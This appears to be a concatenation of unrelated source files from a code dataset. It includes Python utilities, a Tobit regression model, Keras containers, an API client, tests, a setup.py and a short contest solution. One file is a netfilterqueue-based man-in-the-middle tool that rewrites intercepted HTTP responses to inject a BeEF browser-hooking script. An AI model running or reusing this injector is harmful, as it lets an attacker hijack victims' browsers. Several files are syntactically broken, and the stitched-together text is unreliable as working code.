"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
] | 29.224215 | 77 | 0.399724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,459 | 0.377321 |
c7b11734daef5c05aa9cf025632e59324996f20e | 2,954 | py | Python | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
]
| 1 | 2017-05-06T04:49:45.000Z | 2017-05-06T04:49:45.000Z | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
]
| null | null | null | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
]
| null | null | null | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item_dict[attr_name] = attr
items.append(item)
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
return HttpResponse(self.json(), mimetype='application/json')
def render_html(self):
pass
| 25.912281 | 69 | 0.613067 | 2,796 | 0.946513 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.09411 |
c7b4d983814129255c3038e65a92199d05319e32 | 6,061 | py | Python | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
]
| 1 | 2021-04-13T03:14:01.000Z | 2021-04-13T03:14:01.000Z | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
]
| null | null | null | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
]
| null | null | null | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
def split_left_right_censored(x, y, cens):
counts = cens.value_counts()
if -1 not in counts and 1 not in counts:
warnings.warn("No censored observations; use regression methods for uncensored data")
xs = []
ys = []
for value in [-1, 0, 1]:
if value in counts:
split = cens == value
y_split = np.squeeze(y[split].values)
x_split = x[split].values
else:
y_split, x_split = None, None
xs.append(x_split)
ys.append(y_split)
return xs, ys
def tobit_neg_log_likelihood(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1])
s = params[-1]
to_cat = []
cens = False
if y_left is not None:
cens = True
left = (y_left - np.dot(x_left, b))
to_cat.append(left)
if y_right is not None:
cens = True
right = (np.dot(x_right, b) - y_right)
to_cat.append(right)
if cens:
concat_stats = np.concatenate(to_cat, axis=0) / s
log_cum_norm = scipy.stats.norm.logcdf(concat_stats) # log_ndtr(concat_stats)
cens_sum = log_cum_norm.sum()
else:
cens_sum = 0
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
mid = scipy.stats.norm.logpdf(mid_stats) - math.log(max(np.finfo('float').resolution, s))
mid_sum = mid.sum()
else:
mid_sum = 0
loglik = cens_sum + mid_sum
return - loglik
def tobit_neg_log_likelihood_der(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1]) # in censReg, not using chain rule as below; they optimize in terms of log(s)
s = params[-1]
beta_jac = np.zeros(len(b))
sigma_jac = 0
if y_left is not None:
left_stats = (y_left - np.dot(x_left, b)) / s
l_pdf = scipy.stats.norm.logpdf(left_stats)
l_cdf = log_ndtr(left_stats)
left_frac = np.exp(l_pdf - l_cdf)
beta_left = np.dot(left_frac, x_left / s)
beta_jac -= beta_left
left_sigma = np.dot(left_frac, left_stats)
sigma_jac -= left_sigma
if y_right is not None:
right_stats = (np.dot(x_right, b) - y_right) / s
r_pdf = scipy.stats.norm.logpdf(right_stats)
r_cdf = log_ndtr(right_stats)
right_frac = np.exp(r_pdf - r_cdf)
beta_right = np.dot(right_frac, x_right / s)
beta_jac += beta_right
right_sigma = np.dot(right_frac, right_stats)
sigma_jac -= right_sigma
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
beta_mid = np.dot(mid_stats, x_mid / s)
beta_jac += beta_mid
mid_sigma = (np.square(mid_stats) - 1).sum()
sigma_jac += mid_sigma
combo_jac = np.append(beta_jac, sigma_jac / s) # by chain rule, since the expression above is dloglik/dlogsigma
return -combo_jac
class TobitModel:
def __init__(self, fit_intercept=True):
self.fit_intercept = fit_intercept
self.ols_coef_ = None
self.ols_intercept = None
self.coef_ = None
self.intercept_ = None
self.sigma_ = None
def fit(self, x, y, cens, verbose=False):
"""
Fit a maximum-likelihood Tobit regression
:param x: Pandas DataFrame (n_samples, n_features): Data
:param y: Pandas Series (n_samples,): Target
:param cens: Pandas Series (n_samples,): -1 indicates left-censored samples, 0 for uncensored, 1 for right-censored
:param verbose: boolean, show info from minimization
:return:
"""
x_copy = x.copy()
if self.fit_intercept:
x_copy.insert(0, 'intercept', 1.0)
else:
x_copy.scale(with_mean=True, with_std=False, copy=False)
init_reg = LinearRegression(fit_intercept=False).fit(x_copy, y)
b0 = init_reg.coef_
y_pred = init_reg.predict(x_copy)
resid = y - y_pred
resid_var = np.var(resid)
s0 = np.sqrt(resid_var)
params0 = np.append(b0, s0)
xs, ys = split_left_right_censored(x_copy, y, cens)
result = minimize(lambda params: tobit_neg_log_likelihood(xs, ys, params), params0, method='BFGS',
jac=lambda params: tobit_neg_log_likelihood_der(xs, ys, params), options={'disp': verbose})
if verbose:
print(result)
self.ols_coef_ = b0[1:]
self.ols_intercept = b0[0]
if self.fit_intercept:
self.intercept_ = result.x[1]
self.coef_ = result.x[1:-1]
else:
self.coef_ = result.x[:-1]
self.intercept_ = 0
self.sigma_ = result.x[-1]
return self
def predict(self, x):
return self.intercept_ + np.dot(x, self.coef_)
def score(self, x, y, scoring_function=mean_absolute_error):
y_pred = np.dot(x, self.coef_)
return scoring_function(y, y_pred)
# EDIT - insert marginal effects function
def margins(self, x, k = 0):
"""
Marginal effects on dependent variable of a regressor, identified by coef
:param x: array with all regressors (independent variables) to make a prediction
:param k: coefficient corresponding to the regressor with respect to which we want to take the marginal effects
:return: an array with the marginal effects estimated at each observation's level
The marginal effect of regressor k on individual i's y is defined as the product of coef[k] and the normal cdf
evaluated at x_i * coeff[k] / sigma
"""
return self.coef_[k] * norm.cdf(self.predict(x) / self.sigma_) | 33.120219 | 123 | 0.620855 | 2,755 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 1,311 | 0.216301 |
c7b509b05f7f3079575b9250d0a2891a9795c878 | 1,554 | py | Python | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
]
| null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
]
| null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'[email protected]',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
| 28.254545 | 62 | 0.548263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 824 | 0.530245 |
c7b513ddbd33e479f8df70d1c5b9306a2ec0133a | 3,072 | py | Python | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
]
| null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
]
| null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
]
| null | null | null | """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
predict_generator = prediction.predict_generator
| 38.4 | 113 | 0.823893 | 2,962 | 0.964193 | 0 | 0 | 0 | 0 | 0 | 0 | 255 | 0.083008 |
c7b60df7ecb95aad435c61ec7e818259064a9562 | 1,851 | py | Python | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
]
| null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
]
| null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
]
| 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.02 | 90 | 0.622366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 523 | 0.28255 |
c7b66acfc0f1fc9f0407ccd4877bc57ccf79afa1 | 4,691 | py | Python | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
]
| null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
]
| null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
]
| 1 | 2020-04-09T10:12:46.000Z | 2020-04-09T10:12:46.000Z | # Copyright © 2015 Elizabeth Myers.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
from pycardcast.deck import (DeckInfo, DeckInfoNotFoundError,
DeckInfoRetrievalError)
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
req = yield from aiohttp.request("get", self.deck_info_url.format
code=code))
if req.status == 200:
json=yield from req.json()
return DeckInfo.from_json(json)
elif req.status == 404:
err="Deck not found: {}".format(code)
raise DeckInfoNotFoundError(err)
else:
err="Error retrieving deck: {} (code {})".format(code,
req.status)
raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
req=yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json=yield from req.json()
return WhiteCard.from_json(json)
elif req.status == 404:
err="White cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err="Error retrieving white cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
req = yield from aiohtp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
def search_iter(self, name=None, author=None, category=None, offset=0,
limit=None):
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
while s.count > 0:
yield s
offset += s.count
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
| 37.830645 | 78 | 0.563206 | 4,091 | 0.87191 | 3,648 | 0.777494 | 3,312 | 0.705882 | 0 | 0 | 779 | 0.166027 |
c7b71c7227264e168736696fa5f4ef910e4d9c22 | 2,345 | py | Python | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
]
| 6 | 2020-01-04T02:00:35.000Z | 2022-03-22T00:32:26.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
]
| 3 | 2020-08-05T15:16:29.000Z | 2022-03-21T07:00:27.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
]
| null | null | null | from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
name = property(_get_name)
| 33.028169 | 72 | 0.665245 | 2,250 | 0.959488 | 0 | 0 | 0 | 0 | 0 | 0 | 329 | 0.140299 |
c7b7578b3382d7cf2565fe8fe7621c5d451e663b | 1,374 | py | Python | conduit_rest/radish/conduit_rest_steps.py | dduleba/tw2019-ui-tests | 5f149c6c2bdb9f2d69a02c038248374f6b0b5903 | [
"MIT"
]
| 1 | 2019-09-27T23:12:07.000Z | 2019-09-27T23:12:07.000Z | conduit_rest/radish/conduit_rest_steps.py | dduleba/conduit-tests | 5f149c6c2bdb9f2d69a02c038248374f6b0b5903 | [
"MIT"
]
| null | null | null | conduit_rest/radish/conduit_rest_steps.py | dduleba/conduit-tests | 5f149c6c2bdb9f2d69a02c038248374f6b0b5903 | [
"MIT"
]
| null | null | null | import time
from faker import Faker
from radish_ext.radish.step_config import StepConfig
from conduit.client import ConduitClient, ConduitConfig
class ConduitStepsConfig(StepConfig):
def __init__(self, context):
super().__init__(context)
self._faker = None
self.client = ConduitClient(ConduitConfig().set_properties(context.cfg.get('conduit_backend').get('url')))
@property
def faker(self):
if self._faker is None:
self._faker = Faker(locale='en-us')
seed = time.time()
self.log.debug(f'Faker seed {seed}')
self._faker.seed()
return self._faker
def get_conduit_config(context):
return ConduitStepsConfig.get_instance(context)
class ConduitRestBaseSteps(object):
def created_user(self, step, ):
"""created User"""
stc_rest = get_conduit_config(step.context)
user_model = {'user': {'username': stc_rest.faker.user_name(),
'password': stc_rest.faker.password(),
'email': stc_rest.faker.email()
}
}
stc_rest.test_data.data.update(user_model)
stc_rest.log.debug(user_model)
ret_json = stc_rest.client.users.register_user(**user_model['user'])
stc_rest.log.info(f'user created {ret_json}')
| 31.227273 | 114 | 0.61936 | 1,134 | 0.825328 | 0 | 0 | 248 | 0.180495 | 0 | 0 | 132 | 0.09607 |
c7b88fe5b2537ef40175e1a577b998fdb2d3a5c9 | 1,233 | py | Python | SummaryExternalClient.py | Hackillinois2k18/Main-Repo | e998cc3283e0469b98a842220a30a72c5b105dad | [
"MIT"
]
| 5 | 2020-03-10T03:23:18.000Z | 2021-11-12T17:06:51.000Z | SummaryExternalClient.py | Hackillinois2k18/FyveBot | e998cc3283e0469b98a842220a30a72c5b105dad | [
"MIT"
]
| 3 | 2018-02-24T05:25:28.000Z | 2018-02-24T05:43:49.000Z | SummaryExternalClient.py | Hackillinois2k18/Main-Repo | e998cc3283e0469b98a842220a30a72c5b105dad | [
"MIT"
]
| 3 | 2019-01-20T14:50:11.000Z | 2021-11-12T17:06:55.000Z | import requests
import credentials
class SummaryExternalClient:
def pullSummaryForUrl(self, artUrl, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"url" : artUrl,
"title" : title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
def pullSummaryForText(self, text, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"text": text,
"title": title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
| 35.228571 | 82 | 0.586375 | 1,194 | 0.96837 | 0 | 0 | 0 | 0 | 0 | 0 | 299 | 0.242498 |
c7b8b9fdf2de5fb240b87971d0e7f35941af2c81 | 1,485 | py | Python | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
]
| null | null | null | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
]
| 1 | 2019-10-08T15:03:56.000Z | 2019-10-08T15:03:56.000Z | tests/test_render.py | awwad/conda-build | b0be80283ec2e3ef7e49b5da923b1438e74e27b5 | [
"BSD-3-Clause"
]
| null | null | null | import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| 33 | 65 | 0.690909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 350 | 0.23569 |
c7b8e20d5ed5e23189a112d56d8a749537d1ecec | 173 | py | Python | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
]
| null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
]
| null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
]
| null | null | null | def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main()
| 10.8125 | 26 | 0.421965 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 40 | 0.231214 |
c7b94b2b66d38c20024028b233b4eaed057202d2 | 5,057 | py | Python | SPAE/read_write.py | simon-schuler/SPAE | 2b970e30838da258b969b316488e7963d66119be | [
"MIT"
]
| null | null | null | SPAE/read_write.py | simon-schuler/SPAE | 2b970e30838da258b969b316488e7963d66119be | [
"MIT"
]
| 1 | 2021-04-12T20:28:55.000Z | 2021-04-12T20:28:55.000Z | SPAE/read_write.py | simon-schuler/SPAE | 2b970e30838da258b969b316488e7963d66119be | [
"MIT"
]
| null | null | null | #Writing MOOG parameter file for the parameter, abundance, and error calculations.
#The parameter file only needs to be written once, at beginning of the routine, because the output
